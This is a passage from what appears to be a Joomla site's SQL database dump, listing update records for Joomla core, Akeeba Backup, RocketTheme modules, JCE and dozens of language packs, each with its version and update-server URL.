package','','pkg_akeeba','package','',0,'8.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-2.html',''),(27623,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27624,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27625,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27626,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27627,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27628,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-2.html',''),(27629,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27630,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27631,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27632,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27633,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-2.html',''),(27634,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27635,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27636,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27637,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27638,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-2.html',''),(27639,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27640,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27641,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-2.html',''),(27642,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(27643,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(27644,3,0,'French','','pkg_fr-FR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(27645,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(27646,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(27647,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(27648,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(27649,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(27650,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(27651,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(27652,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(27653,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(27654,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(27655,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(27656,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(27657,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(27658,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(27659,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(27660,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(27661,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.24.2','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(27662,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(27663,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(27664,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(27665,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(27666,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(27667,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(27668,3,0,'English US','','pkg_en-US','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(27669,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(27670,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(27671,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(27672,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(27673,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(27674,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(27675,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(27676,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(27677,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(27678,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(27679,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(27680,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(27681,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(27682,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(27683,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(27684,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(27685,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(27686,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(27687,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(27688,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(27689,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(27690,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(27691,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(27692,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(27693,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(27694,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(27695,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(27696,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(27697,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(27698,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(27699,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(27700,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(27701,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(27702,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(27703,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(27704,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(27705,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(27706,57,0,'French','','pkg_fr-FR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(27707,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(27708,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(27709,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(27710,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(27711,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(27712,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(27713,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(27714,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(27715,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(27716,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(27717,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(27718,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(27719,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(27720,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(27721,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(27722,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(27723,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.24.2','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(27724,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(27725,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(27726,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(27727,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(27728,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(27729,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(27730,57,0,'English US','','pkg_en-US','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(27731,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(27732,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(27733,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(27734,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(27735,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(27736,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(27737,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(27738,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(27739,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(27740,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(27741,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(27742,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(27743,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(27744,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(27745,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(27746,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(27747,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(27748,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(27749,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(27750,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(27751,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(27752,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(27753,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(27754,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(27755,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(27757,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(27759,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',1,'4.8.5','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-4-8-5			\n		',''),(27760,129,0,'JCE 2.9.3','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.3','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-3-released',''),(27761,137,0,'Regular Labs - What? Nothing!','','whatnothing','plugin','system',0,'15.0.1FREE','','https://download.regularlabs.com/updates.xml?e=XXX&type=.xml','https://www.regularlabs.com/extensions/whatnothing/features',''),(27762,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27763,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27764,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-2.html',''),(27765,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27766,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27767,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27768,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-2.html',''),(27769,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27770,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27771,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27772,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27773,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27774,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27775,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-2.html',''),(27776,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27777,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27778,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-2.html',''),(27779,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27780,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27781,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27782,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-2.html',''),(27783,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27784,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27785,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(27786,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(27787,3,0,'French','','pkg_fr-FR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(27788,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(27789,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(27790,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(27791,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(27792,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(27793,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(27794,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(27795,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(27796,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(27797,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(27798,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(27799,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(27800,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(27801,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(27802,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(27803,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(27804,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.24.2','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(27805,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(27806,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(27807,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(27808,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(27809,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(27810,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(27811,3,0,'English US','','pkg_en-US','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(27812,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(27813,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(27814,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(27815,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(27816,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(27817,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(27818,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(27819,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(27820,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(27821,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(27822,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(27823,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(27824,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(27825,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(27826,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(27827,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(27828,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(27829,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(27830,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(27831,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(27832,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(27833,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(27834,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(27835,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(27836,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(27837,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27838,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(27839,20,0,'RokCommon 